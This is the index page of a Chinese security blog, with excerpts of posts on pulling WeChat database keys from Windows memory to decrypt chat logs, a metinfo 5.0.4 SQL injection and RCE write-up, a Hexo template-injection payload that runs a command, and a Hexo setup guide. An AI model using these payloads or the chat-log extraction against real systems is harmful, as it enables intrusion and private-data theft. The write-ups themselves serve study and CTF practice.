avatar
文章
64
标签
27
分类
0

主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者
c0ll4r
搜索
主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者

c0ll4r

获取windows微信聊天记录(持续更新偏移地址)
发表于2023-12-07
background昨天看到篇文章写的实战中各种密码凭证的获取,其中包括了钓鱼运维然后从微信中获取敏感信息。这一直是我比较感兴趣的模块。在这之前微信聊天记录的数字化我只会聊天记录备份到模拟器然后再解密。说实话没啥太大的应用空间,不管是实战还是取证也好,这个手段都是不现实的。文章里写的手法是直接上windows,然后拿key解密数据库,这确实是一种高效实用的办法。 获取秘钥微信聊天记录数据库存在了wxid_xxxxxxxxxx/msg/Multi/MSG*.db(数据库每达到270m就会生成一个新的,*就是数据库的编号)引导文件是wxid_xxxxxxxxxx/msg/MicroMsg.db我们要做的就是获取到数据库的秘钥,不同版本的windows微信偏移地址不一样。C#编译成exe命令 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc test.cs 源代码 using System;using System.Collections.Generic;using System.Diagn ...
metinfo5.0.4 RCE
发表于2023-12-05
background某次线下赛遇见的,然后就想着复盘一下。版本是metinfo5.0.4,我找这个版本找了老一会,后面别人跟我说5.0.4这个版本是4.0升级上去的,所以先装4.0再装5.0.4。 https://www.metinfo.cn/faq/1519.html 此文没任何技术含量,我太菜了,就仅仅是做个学习记录。 前台sql注入漏洞sqlmap命令python sqlmap.py -u "http://metinfo.com/about/show.php?lang=cn&id=15" --dbs --batch explang=cn&id=-2506 UNION ALL SELECT 68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,CONCAT(0x7170706b71,0x6a58425864747852627a625169766a5643464650676e7170775871566e59585279484263744f496c,0x71716b7871),68, ...
hexo的rce
发表于2023-11-26
{{joiner.constructor(“global.process.mainModule.require(‘child_process’).exec(‘Calc.exe’)”)() }} 很鸡肋的洞,不能直接带来啥大的危害。 https://gem-love.com/2023/07/25/hexo%E5%8D%9A%E5%AE%A2%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
我的新博客
发表于2023-11-24
backgroundhexo搭建安装git https://git-scm.com/downloads 安装nodejs https://nodejs.org/en/ 换源 npm config set registry http://registry.npm.taobao.org/ 安装(找一个文件夹存放博客的文件,右键-open git bash) npm install hexo-cli -ghexo inithexo s 主题美化安装各种依赖环境,我这里就直接安所有的包了,直接替换掉package.json里的内容,然后在目录下npm install { "name": "hexo-site", "version": "0.0.0", "private": true, "scripts": { "build": "hexo generate", "clean&qu ...
1…67
avatar
c0ll4r
文章
64
标签
27
分类
0
公告
Email:root@pwns.fun
最新文章
上帝给你关了一扇门,他会打开一扇窗2025-05-01
红日32025-03-10
靶机-ORASI: 12025-02-25
darkhole_2靶机2025-02-22
vulnhub_Web-Machine-N72025-02-17
标签
内网渗透 ssrf poc springboot python C vulhub jwt nodejs ssti web other 代码审计 权限提升 xss ctf 渗透测试 攻防演练 文件包含 awd java安全 crypto 内网 rce sql注入 漏洞复现 碎碎念
归档
  • 五月 20251
  • 三月 20251
  • 二月 20255
  • 一月 20251
  • 十二月 20247
  • 十一月 20247
  • 十月 20243
  • 九月 20244
网站资讯
文章数目 :
64
本站总字数 :
81.2k
最后更新时间 :
©2020 - 2025 By c0ll4r
框架 Hexo|主题 Butterfly
湘ICP备2023001513号 湘公网安备 43310102000328号
搜索
数据库加载中